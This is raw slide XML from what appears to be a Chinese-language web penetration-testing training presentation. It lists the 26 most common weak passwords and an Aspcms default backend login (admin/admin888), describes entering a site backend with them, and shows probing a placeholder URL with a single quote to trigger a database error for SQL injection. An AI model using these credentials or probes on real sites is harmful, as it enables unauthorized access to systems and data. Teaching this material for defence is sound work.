            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令、后台弱口令、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令、数据库弱口令、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TOP26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>123456 123456789 111111 123123 12345678 000000 5201314 11111111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Wodima123 a123456789 zxcvbnm 123456a 123321 qq123456 woaini1314</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>123456789a passport 1234567890 1314520 abc123456 123123123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1234567 7758521 666666 woaini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>a123456</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="8699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弱口令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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10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1188" y="1103313"/>
            <a:ext cx="4227439" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Aspcms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>建站系统进入后台，发现存在弱口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>User:admin pass:admin888</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63491" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="1844824"/>
            <a:ext cx="6408712" cy="4815560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="260350"/>
            <a:ext cx="874712" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>弱口令</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67544" y="980728"/>
            <a:ext cx="3467616" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用弱口令，成功渗透进入网站后台</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64516" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="260350"/>
            <a:ext cx="874712" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64517" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1412875"/>
            <a:ext cx="6911975" cy="5194300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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684213" y="260350"/>
            <a:ext cx="1565275" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>参考书籍推荐</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71685" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="1058863"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71686" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="719045" y="1425575"/>
            <a:ext cx="5844870" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、网站安全攻防秘笈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御黑客和保护用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条超级策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全深度剖析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗透测试指南</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、白帽子讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全</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4525" y="3357563"/>
            <a:ext cx="5314950" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>THANKS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E91A28"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="Picture 2" descr="C:\Users\YaoZhang\Desktop\ThinkSec.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000375" y="1500188"/>
            <a:ext cx="2921000" cy="1038225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2928938" y="2500313"/>
            <a:ext cx="3643312" cy="1071562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>成都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E91A28"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>深思</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>科技</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1576388" y="188913"/>
            <a:ext cx="6019800" cy="6386512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="41300">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="TextBox 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="2644775"/>
            <a:ext cx="6980237" cy="1555750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="94901"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" b="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞</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手工注入数据库类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1125538"/>
            <a:ext cx="8642350" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞是因为字符过滤不严谨所造成的，可以得到管理员的帐号密码等相关资料。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="1700213"/>
            <a:ext cx="8135937" cy="3016210"/>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在网站首页上，有名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>不能打开新窗口的多种解决方法”的链接，地址为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http://www.xxxx.com/showdetail.asp?id=49</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Microsoft JET Database Engine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>错误 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>'80040e14'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
